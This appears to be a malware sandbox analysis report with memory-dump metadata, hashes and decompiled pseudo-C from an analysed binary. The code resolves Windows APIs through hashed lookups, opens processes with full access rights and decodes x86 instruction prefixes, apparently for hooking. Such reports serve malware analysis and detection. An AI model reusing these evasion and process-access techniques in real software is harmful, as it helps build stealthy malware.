0x7099a9e2
0x7099a9e4
0x7099a9f7
0x7099a9f9
0x7099a9fb
0x7099aa16
0x7099aa16
0x7099aa1a
0x7099aa1c
0x00000000
0x00000000
0x7099aa1e
0x7099aa21
0x7099aa42
0x7099aa61
0x7099aa67
0x7099aa6a
0x7099aa6f
0x7099aa70
0x7099aa74
0x00000000
0x00000000
0x7099aa7c
0x7099aa7c
0x7099aa7e
0x7099aa8a
0x7099aa96
0x7099aaa0
0x7099aaa3
0x7099aaa6
0x7099aaaa
0x7099aab1
0x7099aab5
0x7099aab9
0x7099aaba
0x7099aabe
0x7099aac3
0x7099aac8
0x7099aacc
0x7099aad0
0x7099aad6
0x7099aadc
0x7099aae2
0x7099aae8
0x7099aaed
0x7099aaee
0x7099aaee
0x00000000
0x7099aa7e
0x00000000
0x7099aa21
0x7099a9ff
0x7099aa10
0x7099aa12
0x7099aa14
0x00000000
0x00000000
0x00000000
0x7099aa14
0x7099aa27
0x00000000
0x7099aa27
0x7099a82b
0x7099a82e
0x7099a830
0x00000000
0x00000000
0x7099a838
0x7099a838
0x7099a83a
0x7099a83a
0x7099a84b
0x7099a84d
0x7099a850
0x00000000
0x00000000
0x7099a946
0x7099a947
0x7099a949
0x00000000
0x00000000
0x00000000
0x7099a949
0x7099a856
0x7099a859
0x7099a863
0x7099a868
0x7099a86a
0x7099a870
0x7099a877
0x7099a87b
0x7099a880
0x7099a884
0x7099acbf
0x7099acd3
0x7099acf6
0x7099acfb
0x7099acfb
0x7099a89b
0x7099a8a0
0x7099a8a0
0x7099a8a0
0x7099a8a0
0x7099a8a6
0x7099a8ab
0x7099a8ad
0x7099a8b2
0x7099a8b9
0x7099a8be
0x7099a8c0
0x7099ac7d
0x7099ac8e
0x7099aca8
0x7099acad
0x7099acad
0x7099a8d6
0x7099a8db
0x7099a8db
0x7099a8db
0x7099a8db
0x7099a8ef
0x7099a90d
0x7099a912
0x7099a922
0x7099a93f
0x7099a941
0x7099a941
0x00000000
0x7099a859
0x7099a70f
0x7099a70f
0x7099a711
0x7099a718
0x7099a726
0x7099a728
0x7099a72b
0x7099a732
0x7099a734
0x7099a765
0x7099a774
0x7099a776
0x7099a778
0x7099a796
0x7099a798
0x7099a79a
0x7099a7ad
0x7099a7cc
0x7099a7d2
0x7099a7d5
0x7099a7ec
0x7099a808
0x7099a80a
0x7099a80a
0x7099a80a
0x7099a80a
0x7099a79a
0x00000000
0x7099a778
0x7099a738
0x7099a738
0x7099a73a
0x7099a74b
0x7099a74d
0x7099a74f
0x00000000
0x00000000
0x7099a75b
0x7099a75c
0x7099a763
0x00000000
0x00000000
0x00000000
0x7099a763
0x7099a751
0x7099a754
0x00000000
0x00000000
0x7099a80d
0x7099a80d
0x7099a80e
0x7099a80e
0x00000000
0x7099a601
0x7099a603
0x7099a603
0x7099a605
0x7099a60c
0x7099a61a
0x7099a61c
0x7099a620
0x7099a624
0x7099a626
0x7099a654
0x7099a657
0x7099a65c
0x7099a660
0x7099a665
0x7099a66c
0x7099a671
0x7099a673
0x7099ac3a
0x7099ac4b
0x7099ac6b
0x7099ac70
0x7099ac70
0x7099a689
0x7099a68e
0x7099a68e
0x7099a68e
0x7099a68e
0x7099a6a0
0x7099a6a2
0x7099a6a4
0x7099a6b5
0x7099a6b5
0x7099a6bb
0x7099a6c0
0x7099a6c4
0x7099a6ca
0x7099a6d1
0x7099a6d6
0x7099a6d8
0x7099abee
0x7099abff
0x7099ac20
0x7099ac25
0x7099ac25
0x7099a6ef
0x7099a6f4
0x7099a6f4
0x7099a6f4
0x7099a6f4
0x7099a6f7
0x7099a6f7
0x00000000
0x7099a6f7
0x7099a62a
0x7099a62a
0x7099a62c
0x7099a63d
0x7099a63f
0x7099a641
0x00000000
0x00000000
0x7099a64d
0x7099a64e
0x7099a652
0x00000000
0x00000000
0x00000000
0x7099a652
0x7099a643
0x7099a646
0x00000000
0x00000000
0x7099a6f8
0x7099a6f8
0x7099a6f9
0x7099a6f9
0x00000000
0x7099a605
0x7099a5fb

Strings

, xrefs: 7099ABB3

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ac38ae67335da74224af6c68536a74d6a925cbe486a4475dd344d1537b319d3c
Instruction ID: 93f0761b42efa139bda0ff6422f8c6d09b7e0ab749e2d9aa508c83aeaba2cdac
Opcode Fuzzy Hash: ac38ae67335da74224af6c68536a74d6a925cbe486a4475dd344d1537b319d3c
Instruction Fuzzy Hash: 05127E715282019FC705DF24C992B6EB7B5EFC5618F118A2DF49A972A0EB30EC01CB87

Uniqueness

Uniqueness Score: -1.00%

Function 709984E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E709984E4(signed int __ecx, intOrPtr __edx) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t316;
				intOrPtr _t318;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				void* _t345;
				void* _t416;
				signed int _t417;
				signed int _t424;
				signed int _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				signed int _t437;
				signed int _t441;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				void* _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				void* _t457;
				intOrPtr* _t458;

				_push(_t435);
				_t458 = _t457 - 0xa4;
				 *_t458 = __ecx + 0x1c;
				 *((intOrPtr*)(_t458 + 0x68)) = __edx;
				 *(_t458 + 4) = __ecx;
				 *(_t458 + 0x84) = 0;
				 *((intOrPtr*)(_t458 + 0x78)) = __ecx + 4;
				while(1) {
					_t415 =  *(_t458 + 0x6c);
					E7099B714(_t458 + 0x24,  *(_t458 + 0x6c), 0x7fffffff);
					if(E7099F56C(_t458 + 0x24) == 0) {
						goto L3;
					} else {
						 *( *(_t458 + 4) + 0x2c) = 0;
						E7099F6F0(_t458 + 0x24);
					}
					L60:
					_t318 = 0xffffffffffffffff;
					L62:
					if(_t318 != 0) {
						L65:
						return _t318;
					} else {
						if( *(_t458 + 0x84) != 0x20) {
							E709A218C(0x5dc, _t415, _t435);
							 *(_t458 + 0x84) =  *(_t458 + 0x84) + 1;
							continue;
						} else {
							_t318 = 0xffffffffffffffff;
							goto L65;
						}
					}
					L71:
					L3:
					__eflags =  *( *(_t458 + 4));
					if( *( *(_t458 + 4)) > 0) {
						_t326 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x64) = _t326 * 4;
							_t434 = E7099F558( *(_t458 + 0x7c), _t326 * 4);
							_t435 =  *(_t458 + 0x20);
							__eflags = _t435;
							if(_t435 <= 0) {
								L11:
								_t435 =  *(_t458 + 4) + 4;
								_t283 = E7099F568( *(_t458 + 4) + 4);
								__eflags = _t283 -  *(_t458 + 0x64);
								if(_t283 >  *(_t458 + 0x64)) {
									_t451 = 4 + _t326 * 4;
									_t299 = E7099F568(_t435);
									__eflags = _t299 - _t451;
									if(_t299 > _t451) {
										 *((intOrPtr*)(_t458 + 0x9c)) = E7099F558(_t435,  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0x98)) = E7099F558(_t435, _t451);
										E709A382C( *((intOrPtr*)(_t458 + 0xa4)),  *((intOrPtr*)(_t458 + 0x9c)), E7099F568(_t435) - _t451);
										_t458 = _t458 + 0xc;
									}
									E7099F8C4(_t435, E7099F568(_t435) + 0xfffffffc);
									_t308 =  *(_t458 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t450 = E709A2F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t450;
								if(_t450 != 0) {
									 *_t450( *(E7099F558( *(_t458 + 4),  *(_t458 + 0x64))));
								}
								_t285 = E7099F568( *_t458);
								__eflags = _t285 -  *(_t458 + 0x64);
								if(_t285 >  *(_t458 + 0x64)) {
									_t453 = 4 + _t326 * 4;
									_t287 = E7099F568( *_t458);
									__eflags = _t287 - _t453;
									if(_t287 > _t453) {
										_t435 = E7099F558( *(_t458 + 4),  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0xa0)) = E7099F558( *(_t458 + 4), _t453);
										E709A382C(_t288,  *((intOrPtr*)(_t458 + 0xa4)), E7099F568( *_t458) - _t453);
										_t458 = _t458 + 0xc;
									}
									E7099F8C4( *(_t458 + 4), E7099F568( *_t458) + 0xfffffffc);
									_t296 =  *(_t458 + 4);
									_t33 = _t296 + 0x18;
									 *_t33 =  *(_t296 + 0x18) - 1;
									__eflags =  *_t33;
								}
								_t326 = _t326 - 1;
								__eflags = _t326;
							} else {
								_t452 = 0;
								__eflags = 0;
								while(1) {
									_t310 = E7099F558(_t458 + 0x28, _t452 * 4);
									__eflags =  *_t310 -  *_t434;
									if( *_t310 ==  *_t434) {
										break;
									}
									_t452 = _t452 + 1;
									__eflags = _t452 - _t435;
									if(_t452 < _t435) {
										continue;
									} else {
										goto L11;
									}
									goto L20;
								}
								__eflags = _t452 - 0xffffffff;
								if(_t452 == 0xffffffff) {
									goto L11;
								} else {
								}
							}
							L20:
							_t326 = _t326 + 1;
							__eflags = _t326 -  *( *(_t458 + 4));
						} while (_t326 <  *( *(_t458 + 4)));
					}
					__eflags =  *(_t458 + 0x20);
					if( *(_t458 + 0x20) > 0) {
						_t325 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x7c) = _t325 * 4;
							_t433 = E7099F558(_t458 + 0x28, _t325 * 4);
							_t258 =  *(_t458 + 4);
							_t435 =  *_t258;
							__eflags = _t435;
							if(_t435 <= 0) {
								L29:
								_t445 = E709A2F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t445;
								if(_t445 != 0) {
									_t447 =  *_t445(0x1fffff, 0,  *((intOrPtr*)(E7099F558(_t458 + 0x28,  *(_t458 + 0x7c)))));
									__eflags = _t447;
									if(_t447 != 0) {
										E7099F8C4( *(_t458 + 4), E7099F568( *_t458) + 4);
										 *(E7099F558( *(_t458 + 4), E7099F568( *_t458) + 0xfffffffc)) = _t447;
										 *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E7099F558(_t458 + 0x28,  *(_t458 + 0x7c));
										 *((intOrPtr*)(_t458 + 0x70)) =  *(_t458 + 4) + 4;
										E7099F8C4( *((intOrPtr*)(_t458 + 0x74)), E7099F568( *(_t458 + 4) + 4) + 4);
										 *((intOrPtr*)(E7099F558( *((intOrPtr*)(_t458 + 0x74)), E7099F568( *((intOrPtr*)(_t458 + 0x70))) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t458 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
							} else {
								_t446 = 0;
								__eflags = 0;
								 *(_t458 + 0x88) =  &(_t258[1]);
								while(1) {
									_t279 = E7099F558( *((intOrPtr*)(_t458 + 0x8c)), _t446 * 4);
									__eflags =  *_t279 -  *_t433;
									if( *_t279 ==  *_t433) {
										break;
									}
									_t446 = _t446 + 1;
									__eflags = _t446 - _t435;
									if(_t446 < _t435) {
										continue;
									} else {
										goto L29;
									}
									goto L32;
								}
								__eflags = _t446 - 0xffffffff;
								if(_t446 == 0xffffffff) {
									goto L29;
								} else {
								}
							}
							L32:
							_t325 = _t325 + 1;
							__eflags = _t325 -  *(_t458 + 0x20);
						} while (_t325 <  *(_t458 + 0x20));
					}
					E7099F6F0(_t458 + 0x24);
					_t173 =  *(_t458 + 4);
					__eflags = _t173[0xb];
					if(_t173[0xb] != 0) {
						_t432 =  *_t173;
						__eflags = _t432;
						if(_t432 > 0) {
							_t435 = 0;
							__eflags = 0;
							_t324 =  &(_t173[1]);
							while(1) {
								_t441 = _t435 * 4;
								_t217 = E7099F558(_t324, _t441);
								_t218 =  *(_t458 + 4);
								__eflags =  *_t217 -  *((intOrPtr*)(_t218 + 0x30));
								if( *_t217 ==  *((intOrPtr*)(_t218 + 0x30))) {
									break;
								}
								_t435 = _t435 + 1;
								__eflags = _t435 - _t432;
								if(_t435 < _t432) {
									continue;
								}
								goto L46;
							}
							__eflags = _t435 - 0xffffffff;
							if(_t435 != 0xffffffff) {
								_t219 = E7099F568( *_t458);
								__eflags = _t219 - _t441;
								if(_t219 > _t441) {
									 *((intOrPtr*)(_t458 + 0x74)) = 4 + _t435 * 4;
									_t247 = E7099F568( *_t458);
									__eflags = _t247 -  *((intOrPtr*)(_t458 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t458 + 0x74))) {
										 *((intOrPtr*)(_t458 + 0x90)) = E7099F558( *(_t458 + 4), _t441);
										 *((intOrPtr*)(_t458 + 0x8c)) = E7099F558( *(_t458 + 4),  *((intOrPtr*)(_t458 + 0x74)));
										E709A382C( *((intOrPtr*)(_t458 + 0x98)),  *((intOrPtr*)(_t458 + 0x90)), E7099F568( *_t458) -  *((intOrPtr*)(_t458 + 0x74)));
										_t458 = _t458 + 0xc;
									}
									E7099F8C4( *(_t458 + 4), E7099F568( *_t458) + 0xfffffffc);
									_t424 =  *(_t458 + 4);
									_t75 = _t424 + 0x18;
									 *_t75 =  *(_t424 + 0x18) - 1;
									__eflags =  *_t75;
								}
								_t220 = E7099F568(_t324);
								__eflags = _t220 - _t441;
								if(_t220 > _t441) {
									_t435 = 4 + _t435 * 4;
									_t237 = E7099F568(_t324);
									__eflags = _t237 - _t435;
									if(_t237 > _t435) {
										_t238 = E7099F558(_t324, _t441);
										 *((intOrPtr*)(_t458 + 0x94)) = E7099F558(_t324, _t435);
										E709A382C(_t238,  *((intOrPtr*)(_t458 + 0x98)), E7099F568(_t324) - _t435);
										_t458 = _t458 + 0xc;
									}
									E7099F8C4(_t324, E7099F568(_t324) + 0xfffffffc);
									_t246 =  *(_t458 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E7099F8C4( *(_t458 + 4), E7099F568( *_t458) + 4);
								 *(E7099F558( *(_t458 + 4), E7099F568( *_t458) + 0xfffffffc)) =  *( *(_t458 + 4) + 0x2c);
								 *((intOrPtr*)( *(_t458 + 4) + 0x18)) =  *((intOrPtr*)( *(_t458 + 4) + 0x18)) + 1;
								E7099F8C4(_t324, E7099F568(_t324) + 4);
								 *((intOrPtr*)(E7099F558(_t324, E7099F568(_t324) + 0xfffffffc))) =  *((intOrPtr*)( *(_t458 + 4) + 0x30));
								 *( *(_t458 + 4)) =  *( *(_t458 + 4)) + 1;
							}
						}
					}
					L46:
					 *((intOrPtr*)(_t458 + 8)) = 0;
					 *((intOrPtr*)(_t458 + 0xc)) = 0;
					E7099F620(_t458 + 0x14, 0);
					 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t458 + 0x68));
					 *((intOrPtr*)(_t458 + 0x38)) = 0;
					E7099F620(_t458 + 0x40, 0);
					_t178 =  *(_t458 + 4);
					_t416 = 0x40;
					__eflags =  *((intOrPtr*)(_t178 + 0x18)) - 0x40;
					_t417 =  <  ?  *((void*)(_t178 + 0x18)) : _t416;
					 *(_t458 + 0x80) = _t417;
					__eflags = _t417;
					if(_t417 <= 0) {
						L57:
						_t415 = E7099F558(_t458 + 0x14, 0);
						_t180 = E709A2878( *((intOrPtr*)(_t458 + 0xc)), _t179, 0x3e8);
						_t132 = _t180 - 0x80; // -128
						_t181 = _t132;
						__eflags = _t181 - 0x3f;
						_t316 =  <=  ? _t181 : _t180;
						__eflags = _t316 - 0x102;
						if(_t316 == 0x102) {
							goto L59;
						} else {
							__eflags = _t316 - 0x3f;
							if(_t316 <= 0x3f) {
								__eflags = _t316 << 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) + 0x2c)) =  *((intOrPtr*)(E7099F558( *(_t458 + 4), _t316 << 2)));
								_t188 = E7099F558( *(_t458 + 0x7c), _t316 << 2);
								_t415 =  *(_t458 + 4);
								 *((intOrPtr*)(_t415 + 0x30)) =  *_t188;
								_t318 =  *((intOrPtr*)(_t415 + 0x2c));
								E7099B680(_t458 + 0x34);
								E7099B680(_t458 + 8);
							} else {
								goto L59;
							}
						}
						goto L62;
					} else {
						_t454 = 0;
						__eflags = 0;
						while(1) {
							E7099CB48(_t458 + 0x4c);
							_t415 = 0;
							_t345 = _t458 + 0x4c;
							 *((char*)(_t345 + 4)) = 0;
							 *((intOrPtr*)(_t345 + 0x20)) = 0;
							__eflags = E7099C33C(_t345);
							if(__eflags != 0) {
								break;
							}
							E7099F8C4(_t458 + 0x14, E7099F568(_t458 + 0x10) + 4);
							 *((intOrPtr*)(E7099F558(_t458 + 0x14, E7099F568(_t458 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t458 + 0x4c));
							 *((intOrPtr*)(_t458 + 0xc)) =  *((intOrPtr*)(_t458 + 0xc)) + 1;
							_t202 = E709A2F8C(0xa5eabdf8, 0xf3119fba);
							__eflags = _t202;
							if(_t202 == 0) {
								_t415 =  *(_t458 + 0x6c);
								__eflags = _t415;
								if(__eflags == 0) {
									break;
								} else {
									__eflags = _t415 - 0xffffffff;
									if(__eflags != 0) {
										E7099F8C4(_t458 + 0x40, E7099F568(_t458 + 0x3c) + 4);
										 *(E7099F558(_t458 + 0x40, E7099F568(_t458 + 0x3c) + 0xfffffffc)) =  *(_t458 + 0x6c);
										 *((intOrPtr*)(_t458 + 0x4c - 0x14)) =  *((intOrPtr*)(_t458 + 0x4c - 0x14)) + 1;
										E7099CDE0(_t458 + 0x4c, __eflags);
										_t454 = _t454 + 1;
										__eflags = _t454 -  *(_t458 + 0x80);
										if(_t454 <  *(_t458 + 0x80)) {
											continue;
										} else {
											_t437 = 0;
											__eflags = 0;
											do {
												_t211 = E7099F558( *(_t458 + 4), _t437 * 4);
												_t212 = E7099F558(_t458 + 0x40, _t437 * 4);
												E70998C14( *_t211, E709A034C(0xa5eabdf8, 0x4145240a),  *_t212, 0, 0);
												_t437 = _t437 + 1;
												__eflags = _t437 -  *(_t458 + 0x80);
											} while (_t437 <  *(_t458 + 0x80));
											goto L57;
										}
									} else {
										break;
									}
								}
							} else {
								__eflags = 0;
								_push(2);
								_push(0);
								_push(0);
								_push(_t458 + 0x6c);
								_push( *((intOrPtr*)(_t458 + 0x78)));
								_push( *((intOrPtr*)(_t458 + 0x60)));
								_push(0xffffffff);
								asm("int3");
								return _t202;
							}
							goto L71;
						}
						E7099CDE0(_t458 + 0x4c, __eflags);
						L59:
						E7099B680(_t458 + 0x34);
						E7099B680(_t458 + 8);
						goto L60;
					}
					goto L71;
				}
			}

0x709984e4
0x709984e8
0x709984f1
0x709984f7
0x709984fb
0x709984ff
0x7099850a
0x7099850e
0x70998513
0x7099851b
0x7099852b
0x00000000
0x7099852d
0x70998535
0x7099853c
0x7099853c
0x70998a8f
0x70998a91
0x70998ad2
0x70998ad4
0x70998ae3
0x70998aef
0x70998ad6
0x70998ade
0x70998af5
0x70998afa
0x00000000
0x70998ae0
0x70998ae2
0x00000000
0x70998ae2
0x70998ade
0x00000000
0x70998546
0x7099854a
0x7099854d
0x70998553
0x70998553
0x70998555
0x7099855c
0x7099856a
0x7099856c
0x70998570
0x70998572
0x7099859e
0x709985a2
0x709985a7
0x709985ac
0x709985b0
0x709985b4
0x709985bb
0x709985c0
0x709985c2
0x70998b51
0x70998b60
0x70998b7f
0x70998b84
0x70998b84
0x709985d5
0x709985da
0x709985de
0x709985de
0x709985de
0x709985ef
0x709985f1
0x709985f3
0x70998604
0x70998604
0x70998609
0x7099860e
0x70998612
0x70998617
0x7099861e
0x70998623
0x70998625
0x70998b13
0x70998b1f
0x70998b39
0x70998b3e
0x70998b3e
0x7099863b
0x70998640
0x70998644
0x70998644
0x70998644
0x70998644
0x70998647
0x70998647
0x70998574
0x70998576
0x70998576
0x70998578
0x70998584
0x7099858b
0x7099858d
0x00000000
0x00000000
0x70998599
0x7099859a
0x7099859c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x7099859c
0x7099858f
0x70998592
0x00000000
0x00000000
0x70998594
0x70998592
0x70998648
0x7099864c
0x7099864d
0x7099864d
0x70998555
0x70998655
0x7099865a
0x70998660
0x70998660
0x70998662
0x70998669
0x70998677
0x70998679
0x7099867d
0x7099867f
0x70998681
0x709986bc
0x709986cb
0x709986cd
0x709986cf
0x709986ed
0x709986ef
0x709986f1
0x70998703
0x70998721
0x7099872a
0x7099872d
0x7099873b
0x7099874c
0x7099876a
0x7099876c
0x70998770
0x70998770
0x70998770
0x709986f1
0x70998683
0x70998687
0x70998687
0x7099868c
0x70998693
0x709986a2
0x709986a9
0x709986ab
0x00000000
0x00000000
0x709986b7
0x709986b8
0x709986ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x709986ba
0x709986ad
0x709986b0
0x00000000
0x00000000
0x709986b2
0x709986b0
0x70998772
0x70998772
0x70998773
0x70998773
0x70998662
0x70998781
0x70998786
0x7099878a
0x7099878e
0x70998794
0x70998796
0x70998798
0x709987a2
0x709987a2
0x709987a4
0x709987a7
0x709987a9
0x709987b1
0x709987b8
0x709987bc
0x709987bf
0x00000000
0x00000000
0x709988bb
0x709988bc
0x709988be
0x00000000
0x00000000
0x00000000
0x709988be
0x709987c5
0x709987c8
0x709987d1
0x709987d6
0x709987d8
0x709987e4
0x709987e8
0x709987ed
0x709987f1
0x70998bce
0x70998be2
0x70998c04
0x70998c09
0x70998c09
0x70998807
0x7099880c
0x70998810
0x70998810
0x70998810
0x70998810
0x70998815
0x7099881a
0x7099881c
0x70998820
0x70998827
0x7099882c
0x7099882e
0x70998b8f
0x70998b9e
0x70998bb7
0x70998bbc
0x70998bbc
0x70998841
0x70998846
0x7099884a
0x7099884a
0x7099884a
0x7099885c
0x7099887d
0x70998885
0x70998893
0x709988b1
0x709988b7
0x709988b7
0x709987c8
0x70998798
0x709988c4
0x709988c6
0x709988ca
0x709988d3
0x709988de
0x709988e2
0x709988eb
0x709988f0
0x709988f6
0x709988f7
0x709988fb
0x709988ff
0x70998906
0x70998908
0x70998a48
0x70998a59
0x70998a60
0x70998a67
0x70998a67
0x70998a6a
0x70998a6d
0x70998a70
0x70998a76
0x00000000
0x70998a78
0x70998a78
0x70998a7b
0x70998a94
0x70998aac
0x70998aaf
0x70998ab4
0x70998abe
0x70998ac1
0x70998ac4
0x70998acd
0x00000000
0x00000000
0x00000000
0x70998a7b
0x00000000
0x7099890e
0x70998910
0x70998910
0x70998912
0x70998916
0x7099891b
0x7099891d
0x70998921
0x70998924
0x7099892c
0x7099892e
0x00000000
0x00000000
0x70998945
0x70998960
0x70998962
0x70998970
0x70998975
0x70998977
0x70998994
0x70998998
0x7099899a
0x00000000
0x7099899c
0x7099899c
0x7099899f
0x709989c0
0x709989df
0x709989e5
0x709989e8
0x709989ed
0x709989ee
0x709989f5
0x00000000
0x709989fb
0x709989fd
0x709989fd
0x709989ff
0x70998a0b
0x70998a17
0x70998a39
0x70998a3e
0x70998a3f
0x70998a3f
0x00000000
0x709989ff
0x00000000
0x00000000
0x00000000
0x7099899f
0x70998979
0x70998979
0x7099897f
0x70998981
0x70998982
0x70998983
0x70998984
0x70998988
0x7099898c
0x7099898e
0x7099898f
0x7099898f
0x00000000
0x70998977
0x709989a5
0x70998a7d
0x70998a81
0x70998a8a
0x00000000
0x70998a8a
0x00000000
0x70998908

Strings

, xrefs: 70998AD6

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction ID: 91490baf81db61d1db917f58ac16a2ba22f6fc8f2a26c2d5a5798c0da9c15e37
Opcode Fuzzy Hash: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction Fuzzy Hash: C91259B12282449FC704DF24C991B6EF7E5AFD5608F11492DF5AA972A0EB30ED04CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 709A92DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E709A92DC(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E709A35D4( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
